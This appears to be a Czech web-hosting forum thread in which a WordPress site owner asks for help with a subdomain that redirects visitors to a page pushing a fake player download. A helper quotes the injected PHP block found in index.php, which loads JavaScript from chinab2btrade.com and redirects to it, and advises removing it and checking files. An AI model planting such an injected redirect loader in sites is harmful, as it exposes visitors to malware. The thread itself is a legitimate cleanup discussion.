Nejste přihlášeni
Dobrý den,
v rámci domény slavikovice.info, hostované na Endoře (stránky www.slavíkovice.info) jsem vytvořil subdoménu spartak.slavíkovice.info (ve stejném webovém prostoru) . Obě stránky fungují bez problému samostatně.
Při posledním zadávání aktualit (2.10.) jsme na webovou stránku www.slavikovice.info dodali odkaz na stránky v subdoméně spartak.slavikovice.info . Vždy dříve toto fungovalo bezchybně, nyní však po vyvolání stránky subdomény dojde po krátké době k přesměrování na podloudnou stránku, která uživateli nutí stažení jakéhosi VIO playeru a není možné prohlížet vlastní stránky. Celé toto má charakter webového viru. Při testování jsem zjistil následující fakta:
- Virus se projevuje pouze při přechodu z hlavních doménových stránek slavikovice.info na szubdoménu spartak.slavikovice.info
- Odkazy na ostatní vnější stránky z webu slavikovice.info jsou v pořádku (chování je normální)
- Rovněž odkaz ze subdomény spartak.slavikovice.info na doménové stránky slavikovice.info se chová zcela standardně
- Odkaz, který se chová závadně je v editoru wordpressu zapsán korektně (myslím v HTML).
- Oboje webové stránky jsou vytvořeny ve wordpressu - konkrétní příspěvky, kde se závadná funkce zjevuje, jsem nedohledal.
Protože se vše děje v rámci jedné domény (která je u vás) a nikde jinde, tak se obracím s prosbou o pomoc nebo tip, co udělat.
Díky
správce webů domény slavíkovice.info
Jaroslav Doležal
Offline
Tato část kódu
#560dc7#
if(empty($hh)) {
$hh = "<script type=\"text/javascript\">var gwloaded = false;</script>
<script src=\"http://chinab2btrade.com/plugins/gwjs.php\" type=\"text/javascript\"></script>
<script type=\"text/javascript\">if (gwloaded==false){window.location = \"http://chinab2btrade.com/plugins/ad.html\";}</script>
<noscript><meta http-equiv=\"refresh\" content=\"0;url=http://chinab2btrade.com/plugins/js.html\" /></noscript>";
echo $hh;
}
#/560dc7#zřejmě do index.php na subdoméně asi nepatří.
Odstraňte ji a také si projděte FTP a nevhodné soubory rovněž odstraňte (ty o kterých jste přesvědčen, že jste je nevložil Vy), projděte si, podle data, změněné soubory a nahraďte je originálními.
Nepoužívejte neověřené doplňky aplikace WP.
1. Murphyho zákon:
Na počátku nebylo nic. I to se pokazilo!
stránky: CMS test
kontakt - instalace systémů, MySQL, FTP přístup, ...
Instalační balíky vybraných CSM
Problémy spojené s provozem služeb Endora, řešte na tomto fóru.
Offline
Díky za tip. Opravdu vše začalo fungovat, jak má. Ve vnitřní struktuře WP jsem našel ještě jedno podivné volání skriptu. Zablokoval jsem ale evidentně to zbytku kódu nevadí.
WP pluginy používám pouze ty, které mi samotný WP nabízí - předpokládám tedy, že jsou validované.
J. Doležal
Offline